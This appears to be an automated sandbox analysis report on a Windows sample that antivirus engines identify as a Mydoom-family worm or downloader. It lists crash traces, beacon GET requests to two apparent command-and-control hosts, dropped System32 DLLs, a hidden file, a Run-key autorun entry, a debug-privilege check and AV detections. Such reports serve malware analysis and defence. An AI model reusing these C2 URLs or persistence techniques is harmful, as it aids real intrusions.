__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 94042304 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 94042344 registers.edx: 2047 registers.ebx: 8854872 registers.esi: 8344784 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 96663744 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 96663784 registers.edx: 2047 registers.ebx: 8850040 registers.esi: 8340064 registers.ecx: 0	1
__exception__ Jan. 21, 2025, 10:11 a.m.	stacktrace: RtlImageNtHeader+0x423 RtlDeleteCriticalSection-0x106e ntdll+0x335b7 @ 0x77e535b7 RtlImageNtHeader+0x30e RtlDeleteCriticalSection-0x1183 ntdll+0x334a2 @ 0x77e534a2 GlobalFree+0x27 HeapCreate-0x11f kernelbase+0x1537d @ 0x7730537d smnss+0x6187 @ 0x406187 smnss+0x5fac @ 0x405fac smnss+0x2f1d @ 0x402f1d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133aa @ 0x75e433aa RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa5 ntdll+0x39f72 @ 0x77e59f72 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xd2 ntdll+0x39f45 @ 0x77e59f45 exception.instruction_r: 32 4e 02 f6 c1 01 0f 84 f5 10 00 00 83 7f 4c 00 exception.symbol: RtlImageNtHeader+0x11c RtlDeleteCriticalSection-0x1375 ntdll+0x332b0 exception.instruction: xor cl, byte ptr [esi + 2] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 209584 exception.address: 0x77e532b0 registers.esp: 91551936 registers.edi: 6684672 registers.eax: 1048576 registers.ebp: 91551976 registers.edx: 2047 registers.ebx: 8855768 registers.esi: 8345600 registers.ecx: 0	1

Performs some HTTP requests (2 events)

request	GET http://ehqnarrrrh.ws/imgs/krewa/nqxa.php?id=d89zkcxo&s5=3159&lip=192.168.168.228&win=fWinS
request	GET http://rawphhnwss.org/imgs/krewa/nqxa.php?id=d89zkcxo&s5=3159&lip=192.168.168.228&win=fWinS

Creates executable files on the filesystem (6 events)

file	C:\Windows\System32\zipfi.dll
file	C:\Windows\System32\shervans.dll
file	C:\Windows\System32\satornas.dll
file	C:\Windows\System32\ctfmen.exe
file	C:\Windows\System32\grcopy.dll
file	C:\Windows\System32\zipfiaq.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Jan. 21, 2025, 10:10 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\system32\satornas.dll filepath: C:\Windows\System32\satornas.dll	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00005600', u'virtual_address': u'0x0000e000', u'entropy': 7.662503336196652, u'name': u'4008cvbx', u'virtual_size': u'0x0000556c'}

entropy

7.6625033362

description

A section with a high entropy has been found

entropy

0.288590604027

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 21, 2025, 10:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Raised Snort alerts (1 event)

snort

ET INFO Observed DNS Query to .biz TLD

Raised Suricata alerts (3 events)

suricata	ETPRO MALWARE Worm.Mydoom Checkin
suricata	ETPRO MALWARE User-Agent (explwer)
suricata	ET INFO Observed DNS Query to .biz TLD

Detects virtualization software with SCSI Disk Identifier trick(s) (2 events)

registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0
registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\1

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen				reg_value	C:\Windows\system32\ctfmen.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ctfmen				reg_value	C:\Windows\system32\ctfmen.exe

File has been identified by 16 AntiVirus engine on IRMA as malicious (16 events)

G Data Antivirus (Windows)	Virus: Dropped:Generic.Mydoom.5713DF4B (Engine A)
Avast Core Security (Linux)	Win32:Mydoom-BJ [Wrm]
C4S ClamAV (Linux)	Win.Malware.Generickdz-9918324-0
F-Secure Antivirus (Linux)	Trojan.TR/Downloader.Gen [Aquarius]
Windows Defender (Windows)	Trojan:Win32/MyDoom!pz
Microsoft Defender ATP (Linux)	Trojan:Win32/MyDoom!pz
Forticlient (Linux)	W32/Agent.NHB!worm
Sophos Anti-Virus (Linux)	Mal/Behav-104
eScan Antivirus (Linux)	Dropped:Generic.Mydoom.5713DF4B(DB)
ESET Security (Windows)	a variant of Win32/Agent.NHB worm
McAfee CLI scanner (Linux)	Trojan-FRMT
DrWeb Antivirus (Linux)	Trojan.DownLoader8.56532
ClamAV (Linux)	Win.Malware.Generickdz-9918324-0
Bitdefender Antivirus (Linux)	Dropped:Generic.Mydoom.5713DF4B
Kaspersky Standard (Windows)	Trojan.Win32.Small.acli
Emsisoft Commandline Scanner (Windows)	Dropped:Generic.Mydoom.5713DF4B (B)

File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 events)

Bkav	W32.AIDetectMalware
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojan.Occamy.S5071046
Skyhigh	BehavesLike.Win32.Mytob.lh
ALYac	Dropped:Generic.Mydoom.5713DF4B
Cylance	Unsafe
VIPRE	Dropped:Generic.Mydoom.5713DF4B
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
BitDefender	Dropped:Generic.Mydoom.5713DF4B
K7GW	Trojan ( 004d7c651 )
K7AntiVirus	Trojan ( 004d7c651 )
Arcabit	Generic.Mydoom.5713DF4B
VirIT	Trojan.Win32.Dnldr8.DFQI
Symantec	W32.Mydoom.B@mm
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Agent.NHB
APEX	Malicious
Avast	Win32:Mydoom-BJ [Wrm]
ClamAV	Win.Malware.Generickdz-9918324-0
Kaspersky	Trojan.Win32.Small.acli
Alibaba	Malware:Win32/km_2edd8.None
NANO-Antivirus	Trojan.Win32.Mudrop.ijmve
MicroWorld-eScan	Dropped:Generic.Mydoom.5713DF4B
Rising	Worm.Mydoom!1.100A4 (CLASSIC)
Emsisoft	Dropped:Generic.Mydoom.5713DF4B (B)
F-Secure	Trojan.TR/Downloader.Gen
DrWeb	Trojan.DownLoader8.56532
Zillya	Trojan.Small.Win32.44096
McAfeeD	Real Protect-LS!D57CC2304C40
Trapmine	malicious.high.ml.score
CTX	exe.unknown.dropped
Sophos	Mal/Behav-104
SentinelOne	Static AI - Malicious PE
FireEye	Generic.mg.d57cc2304c405554
Jiangmin	TrojanDropper.Mudrop.cbn
Webroot	W32.Malware.gen
Google	Detected
Avira	TR/Downloader.Gen
Antiy-AVL	Trojan/Win32.Small
Kingsoft	malware.kb.a.1000
Gridinsoft	Trojan.Win32.Agent.bot!s1
Xcitium	TrojWare.Win32.Small.AD@83l0z7
Microsoft	Trojan:Win32/MyDoom!pz
GData	Win32.Trojan.PSE.1BC1FFR
Varist	W32/Mydoom.G.gen!Eldorado
AhnLab-V3	Trojan/Win.Generic.R643764
Acronis	suspicious
McAfee	Trojan-FRMT!D57CC2304C40
DeepInstinct	MALICIOUS

Screenshots

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action	VT	Location
No hosts contacted.

Browser recommendation

File 505cb6e050387f3649a5edee7b96a69135ffafd51f0a805ae2d5c07b203cf5e2

Summary Download Resubmit sample

Score

Autosubmit

Feedback

Information on Execution

Analyzer Log

Cuckoo Log

Signatures

Feedback

Summary
Download Resubmit sample